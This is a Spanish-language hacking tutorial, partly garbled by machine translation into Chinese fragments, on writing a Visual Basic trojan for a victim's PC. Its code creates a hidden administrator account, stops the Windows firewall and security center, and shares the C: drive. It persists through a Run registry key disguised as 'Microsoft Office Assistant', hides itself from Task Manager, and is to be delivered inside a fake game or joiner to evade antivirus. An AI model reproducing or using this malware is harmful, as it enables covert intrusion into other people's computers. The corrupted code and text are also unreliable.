肮脏但有效, 您对其进行编程, 你编译它, 防病毒软件没有检测到它,每个人都很高兴 ;)
Lo 第一, comandos MSDOS que nos interesan saber para después meterlos en el código de Visual Basic para ejecutar en el PC de la víctima,
COMANDO
|
EJEMPLO
|
DESCRIPCIÓN
|
net 用户用户名 password /ADD | net user IUSR_wXP piruli /add | Crea el usuario IUSR_wXP con la contraseña ‘piruli’ para que cuando queramos entrar en el PC remoto ya tengamos un usuario y una contraseña |
网络组名称groupusername /ADD | net localgroup Administradores /add IUSR_wXP | Al usuario creado anteriormente le mete en el grupo administradores, para que no tengamos problemas de permisos. Somos el administrador del PC, que más queremos!! 🙂 |
net stop nombredelservicio | net stop “Firewall de Windows/Conexión compartida a Internet (集成电路)” | Sirve para detener servicios que no queremos que nos controle, por ejemplo el firewall de Windows XP, el antivirus, el Antispiware… |
net share nombrerecurso=Path: | net share C=C: | Comparte unidades de disco o el path que nos interese en el PC que se ejecute |
不错, todos estos comandos, si se nos ocurren más podemos ejecutarlos en el PC del tio que nos interese entrarle en su PC (esto es cuestión de imaginación), por ejemplo con estos nos sirve para crearnos un usuario que sea Administrador, le paramos el firewall y entramos a su disco C, todo por internet y de la forma más sencilla, ahora sólo nos falta que lo ejecute… y como? la mar de sencillo, lee abajo.
还行, ahora yo lo suelo hacer con Visual Basic, no soy un experto en la materia ni mucho menos, pero hago algún programilla o algún juego para el tio a hackearle y le meto estas lineas. O sino simplemente genero el programilla de VB con estas 4 lineas y con un Joinner (que es un programa que me une varios archivos se lo mando) 例如, le mando un PPS típico de txorradas y con el joinner le hago que se ejecute en segundo plano, lo malo que los joinners los detectan los antivirus, por eso prefiero hacer yo el juego con VB, aunque sea super estúpido, pero que lo ejecute.
第二, cómo hacer que se ejecute todo esto cada vez que arranque su ordenador, muy bien, entrando en el registro y generando una entrada aqui:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
哦,好吧, vamos a lo que es el código fuente de VB necesario, este sería para ejecutar los comandos de MSDOS que nos interesen, se crea una Sub con este contenido y se definen estas dos funciones arriba de todo.
Private Declare Function OpenProcess Lib “kernel32” (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) 只要 Private Declare Function GetExitCodeProcess Lib “kernel32” (ByVal hProcess 只要, lpExitCode 只要) 只要Sub ParaServiciosYcreaUsuario() 䵨 hShell As Long
䵨 hProc As Long 䵨 codExit As Long 䵨 sCmd As String 䵨 Comando As String ‘ Para el servicio de Centro de seguridad  Comando = “net stop ” & 中国(34) & “Centro de seguridad” & 中国(34)  sCmd = “cmd /c ” & 命令  hShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide) ‘ el Chr(34) son las comillas dobles, para ejecutar un commando de MSDOS que sea una frase larga necesitamos ejecutarlo con dobles comillas, pues así se pondría para que VB lo ejecute bien. ‘ Para el servicio del Firewall de Windows  Comando = “net stop ” & 中国(34) & “Firewall de Windows/Conexión compartida a Internet (集成电路)” & 中国(34)  sCmd = “cmd /c ” & 命令  hShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide) ‘ Crea el usuario IUSR_wXP2
 Comando = “net user IUSR_wXP2 Hh3rr3r01 /add”  sCmd = “cmd /c ” & 命令  hShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide) ‘ Mete al usuario en el grupo de Administradores local ‘ Comparte C: su disco duro como C para que entremos x la red, aunque tambien podríamos entrar como C$ |
还行, ahora si lo que nos interesa es meterlo en el registro para que se inicie siempre que arranque el PC de la víctima y que cada vez que reinicie su PC le pare el servicio del firewall, le comparta C…
Sub MeteloEnRegistro() 䵨 hregkey 只要 䵨 subkey 作为字符串  subkey = “SoftwareMicrosoftWindowsCurrentVersionRun” 䵨 stringbuffer 作为字符串 䵨 PathPrograma 作为字符串  PathPrograma = “C:WINDOWSsystem32svchost32.exe” 䵨 NombrePrograma 作为字符串  NombrePrograma = “Microsoft Office Assistant” retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hregkey) 如果 retval <> 0 Then Debug.Print “Can’t open the subkey” Exit Sub End If stringbuffer = PathPrograma & vbNullChar  retval = RegSetValueEx(hregkey, NombrePrograma, 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))  RegCloseKey hregkey 结束子 |
Y necesitamos en un módulo meter esto:
Public Declare Function RegOpenKeyEx Lib “advapi32.dll” 别名 “RegOpenKeyExA” (ByVal hKey 只要, ByVal lpSubKey 作为字符串, ByVal ulOptions 只要, ByVal samDesired 只要, phkResult 只要) 只要 Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey 只要) 只要 Public Declare Function RegSetValueEx Lib “advapi32.dll” 别名 “RegSetValueExA” (ByVal hKey 只要, ByVal lpValueName 作为字符串, ByVal Reserved 只要, ByVal dwType 只要, lpData As Any, ByVal cbData 只要) 只要Public Const HKEY_CURRENT_USER = &H80000001 Public Const KEY_WRITE = &H20006 Public Const REG_SZ = 1 |
Puedes descargarte el código fuente completo de 这里. Si tenéis alguna sugerencia es pedirlo o decirlo!
Personalmente me gusta poner esto al principio, cuando se carga la aplicación, es para que el usuario no lo vea ni en pantalla ni en el “任务管理器” que suele ser perfecto para que no nos mate el proceso.
Me.Visible = 假 App.TaskVisible = 假 |